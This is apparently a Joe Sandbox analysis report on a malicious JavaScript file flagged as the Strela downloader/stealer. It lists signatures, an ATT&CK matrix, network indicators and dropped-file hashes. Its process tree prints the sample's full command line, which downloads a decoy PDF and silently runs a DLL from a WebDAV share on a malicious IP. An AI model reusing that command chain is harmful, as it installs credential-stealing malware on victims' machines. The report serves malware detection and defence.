Windows
Analysis Report
2322331617238881677.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 5788 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\23223 3161723888 1677.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 4052 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\997 7155262790 3.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5072 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 3360 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5648 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7268 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 12 --field -trial-han dle=1640,i ,410116335 3923510486 ,889112417 9636225307 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3416 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse | ||
11% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588665 |
Start date and time: | 2025-01-11 03:52:58 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 3s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2322331617238881677.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@28/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 162.159.61.3, 172.64.41.3, 184.28.88.176, 184.28.90.27, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 2.22.242.11, 2.22.242.123, 23.46.156.44, 23.46.156.25, 23.46.156.28, 23.46.156.53, 23.46.156.50, 23.46.156.47, 192.168.2.6, 13.107.246.45, 20.12.23.50, 3.233.129.217, 23.56.162.204, 52.165.164.15, 172.202.163.200
- Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
21:53:57 | API Interceptor | |
21:54:02 | API Interceptor | |
21:54:02 | API Interceptor | |
21:54:09 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7262900690536263 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0W:9JZj5MiKNnNhoxuY |
MD5: | 00300F98F42CB65A231990CE900BD7BB |
SHA1: | 597F27212420F9CE67D5EABF8893D8E98E97E936 |
SHA-256: | 50BCBEBA8494FF726B4FDBEE581DE784A74233173352792E61A0CAD469BB9656 |
SHA-512: | 505120DCFC9459B6544712E05196D987BF48205AEB55D518895B4B0B68512D11B7941F57699BFF5B343A1B0D9835CA6A136D5EE2D3D33D5F26DA070A8CF9D753 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555556497624518 |
Encrypted: | false |
SSDEEP: | 1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL |
MD5: | 53CD63D2C635970F527459A127491921 |
SHA1: | 5B2AF5222DDED309C17AB95D5753F2AA16A38DB6 |
SHA-256: | EAC635EF35BA6DC3C7FDF89C943F94B9D7F0312B77F2F64347C07B0648C82919 |
SHA-512: | BC8601F8F74E148ED17014F483090C5F2AE33F77D8388EA9166EA2DBC0E0DE3D8FD9082F5691EB23F9DA84453FEEBB1B676F3DAD6A1015478FBDED27634C74F9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07921949527885713 |
Encrypted: | false |
SSDEEP: | 3:Z9lXKYeQPOBuNaAPaU1l8RXolluxmO+l/SNxOf:NXKz7BuNDPaUzgmOH |
MD5: | 24118B3A9C1988DC06519E05F081E7F5 |
SHA1: | 4ED4E5F17346D21187218C9F716259E496786EC5 |
SHA-256: | 6F461D0054A8F23F12CC1BB82DF3064D2F97B1C5B67A15599BAF98746D6BC579 |
